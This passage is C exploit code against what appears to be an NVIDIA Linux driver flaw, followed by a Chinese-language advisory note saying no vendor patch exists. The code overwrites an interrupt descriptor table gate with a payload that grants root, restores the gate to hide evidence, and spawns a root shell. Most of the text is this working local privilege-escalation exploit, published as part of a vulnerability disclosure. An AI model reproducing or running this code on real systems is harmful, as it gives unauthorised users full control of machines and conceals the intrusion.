// X86_OF_ENTRY
unsigned long idtentry = getidt() + (2*sizeof(unsigned long)*4);
pack_gate(&gate, GATE_INTERRUPT, KERNEL_BASE, YES_PLEASE, 0, __KERNEL_CS);
for (i = 0; i < 256; ++i) {
kernel_ofs_phys = i * 1024 * 1024;
physread16(handle, virt2phys(idtentry), buf);
// Copy offsets since we don't really care about them
gate.offset_low = dp->offset_low;
gate.offset_middle = dp->offset_middle;
#ifndef __x86_64__
gate.segment = dp->segment;
if (*(uint64_t*)&dp[1] == 0x00000000ffffffffULL) {
printf("[X] 64-bits kernel found at ofs %lx\n", kernel_ofs_phys);
printf("[X] Compiled for 32-bits only\n");
continue;
}
#endif
if (!memcmp(&gate, dp, sizeof(*dp))) {
printf("[*] %zu-bits Kernel found at ofs %lx\n", sizeof(void*)*8, kernel_ofs_phys);
found = 1;
break;
}
}
if (!found) {
printf("[X] No kernel found! >:(\n");
return -1;
}
idtentry = getidt() + (2*sizeof(unsigned long)*ENTRY);
printf("[*] Using IDT entry: %d (%#lx)\n", ENTRY, idtentry);
physread16(handle, virt2phys(idtentry), buf);
dump_gate(dp);
printf("[*] Enhancing gate entry...\n");
pack_gate(&gate, GATE_INTERRUPT, (uintptr_t)&(testgetroot), YES_PLEASE, 0, __KERNEL_CS);
kernel_write(handle, idtentry, (unsigned long)&gate, sizeof(gate));
physread16(handle, virt2phys(idtentry), (uint32_t*)gate2);
if (memcmp(&gate, gate2, sizeof(gate))) {
printf("[ ] Failed!\n");
return -1;
}
printf("[*] Triggering payload...\n");
ret = callsetroot(getuid(), getgid());
// And restore old one, I'm kind like that
printf("[*] Hiding evidence...\n");
kernel_write(handle, idtentry, (unsigned long)dp, sizeof(*dp));
if (ret)
printf("callsetroot returned %lx (%li)\n", ret, ret);
if (getuid()) {
printf("[*] Failed to get root.\n");
return -1;
}
printf("[*] Have root, will travel..\n");
execl("/bin/bash", "sh", NULL);
perror("/bin/bash");
return 1;
}
建议:
--------------------------------------------------------------------------------
厂商补丁:
NVIDIA
------
目前厂商还没有提供补丁或者升级程序。上述代码表明该问题可被本地用户用于提升至 root 权限,因此在补丁发布之前,建议仅允许受信任的用户本地登录受影响的系统。我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: